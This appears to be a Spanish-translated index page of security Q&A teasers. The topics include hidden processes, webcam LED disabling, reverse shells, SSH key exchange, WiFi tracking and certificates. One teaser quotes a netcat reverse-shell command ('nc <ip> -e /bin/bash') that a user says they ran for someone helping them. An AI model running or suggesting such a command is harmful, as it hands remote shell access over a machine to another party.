Todas las preguntas

4
respuestas

Cómo encontrar procesos que están ocultos del administrador de tareas

He leído que puede ocultar procesos del administrador de tareas, ejemplo aquí He visto algunas publicaciones en keyloggers ocultos usando rootkit, pero eso es todo. ¿Hay alguna herramienta o forma de ver los procesos que se están ejecuta...
pregunta 16.12.2014 - 11:13
1
respuesta

¿Cómo puede un pirata informático deshabilitar el LED conectado a una cámara web sin dañar gravemente el hardware?

Algunas cámaras web tienen un LED al lado que notifica al usuario que está funcionando. Se supone que los hackers pueden deshabilitar este LED para espiar a sus víctimas sin su conocimiento, pero ¿cómo puede deshabilitar un componente, en est...
pregunta 28.11.2016 - 10:19
3
respuestas

¿cómo se comporta la shell inversa?

Alguien me estaba ayudando con un problema en mi servidor vagrant. Pudo acceder al shell a través de (lo ejecuté para él, con su ip y puerto): nc <ip> -e /bin/bash <port> Nunca he encontrado esto antes, pero me pareció muy inter...
pregunta 11.02.2016 - 22:01
1
respuesta

¿Cómo utiliza SSH tanto RSA como Diffie-Hellman?

El protocolo SSH 2 le permite usar las claves DSA, ECDSA, ED25519 y RSA al establecer una conexión segura a un servidor. (Tenga en cuenta para esta pregunta que solo estoy familiarizado con el procedimiento y las capacidades de RSA y no puedo h...
pregunta 26.12.2014 - 16:33
5
respuestas

¿Qué información de computadora pueden ver las redes WiFi? [duplicar]

Estoy en una red WiFi de la escuela, y su política es registrar información básica de la PC (nombre, IP, etc.), junto con el nombre del estudiante cuando agregan la computadora a la red WiFi. Mi suposición es que es para seguirnos. Sin embargo...
pregunta 01.12.2016 - 14:23
3
respuestas

diferencia entre las autoridades de certificación

Me he estado preguntando durante mucho tiempo acerca de si. Hay muchas autoridades de certificación que tienen diferentes tipos de certificados. Pero incluso los certificados del mismo nivel de seguridad cuestan mucho más con un proveedor de cer...
pregunta 28.03.2012 - 11:02
2
respuestas

¿Cómo no revelar que está utilizando PHP?

Estoy construyendo un sitio web, pero algunas herramientas web y complementos del navegador permiten que cualquier persona obtenga información sobre las tecnologías en las que se ha desarrollado el sitio web. ¿Hay alguna alternativa para no reve...
pregunta 18.02.2013 - 18:53
3
respuestas

nf_conntrack: tabla llena, descargando paquete

Veo muchos de estos mensajes en / var / log / messages de mi servidor Linux kernel: nf_conntrack: table full, dropping packet. kernel: __ratelimit: 15812 callbacks suppresse mientras mi servidor está bajo ataque DoS pero la memoria aún no e...
pregunta 02.10.2013 - 05:44
5
respuestas

¿Una forma estándar de agregar manualmente una firma digital a un archivo pdf?

He creado algunos certificados para usar, pero me siento perplejo cuando se trata de crear un certificado que contiene una firma digital. En primer lugar, ¿cómo puedo hacer para crear un certificado estándar que ya no contiene solo campos comune...
pregunta 30.04.2013 - 20:12
3
respuestas

Si tengo dos imágenes de máquina virtual de Linux idénticas, ¿generarán números aleatorios idénticos?

Una pregunta realmente noob, lo sé, pero algo sobre lo que me estaba preguntando esta mañana. Si este fuera el caso, ¿cifrarían las cosas de manera idéntica? ¿O tal vez alguien podría dirigirme a una investigación útil sobre cómo Linux genera...
pregunta 01.05.2012 - 13:47